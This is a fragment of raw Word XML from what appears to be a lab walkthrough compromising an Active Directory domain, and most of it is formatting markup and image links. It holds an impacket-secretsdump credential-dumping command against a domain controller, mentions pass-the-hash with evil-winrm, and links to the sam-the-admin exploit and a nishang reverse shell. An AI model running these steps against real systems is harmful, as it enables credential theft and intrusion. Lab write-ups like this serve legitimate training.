                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>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KRB5CCNAME='Administrator.ccache' proxychains4 /usr/bin/impacket-secretsdump -target-ip 172.20.128.1 -dc-ip 172.20.128.1 -k -no-pass @'ec2amaz-p99pset.kiwi.uhclabs'</w:t>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03400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69"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Administrator hash dumped, we can perform </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass-the-Hash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> using evil-winrm.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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that, simply read the final flag located on the Administrator Desktop =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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17800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58"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headerReference r:id="rId48" w:type="default"/>
      <w:headerReference r:id="rId49" w:type="first"/>
      <w:headerReference r:id="rId50" w:type="even"/>
      <w:footerReference r:id="rId51" w:type="default"/>
      <w:footerReference r:id="rId52" w:type="first"/>
      <w:footerReference r:id="rId5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A">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="16"/>
    <w:bookmarkEnd w:id="1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80" name="image17.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image17.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8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8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1.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image1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Kiwi</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7.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image37.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15.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WazeHell/sam-the-admin" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId45"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eader" Target="header1.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><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6.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dirkjanm/ldapdomaindump" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://flylib.com/books/en/2.335.1.86/1/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-remotemanagementusers" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.infosecmatter.com/rce-on-windows-from-linux-part-2-crackmapexec/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.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hyperlink" Target="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1" TargetMode="External"/><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21.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.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7.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37.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FVZ3Nz3lgnbzLE//AjwAalD3aw==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLmo5c2dkdzQ3cnhpYjIOaC5jOHU2enl3bHozeXQyDmgudmt0MGF0MmdzNjhnMg5oLmV3NmtzM3dkMzd6bDIOaC5hcTU5M2hsaW9pOTgyDmguZDFtcTA2djdseGE1Mg5oLjE3czZzanNhcTh2dTIOaC5vajZ4ZW5zaHdpZWIyDmguczA1MjhtbTliZ2E3Mg5oLjR1bWFjdngycWY3ZTIOaC5yZmZjamdnbWo5NHYyDmguczZ3N2JvaDRobjliMg5oLjE3NWY1Y3M5NHowbzgAciExYW8xTE5yYnFfbDRhUnU5ZzRGZnByTThrWC0wVnJsc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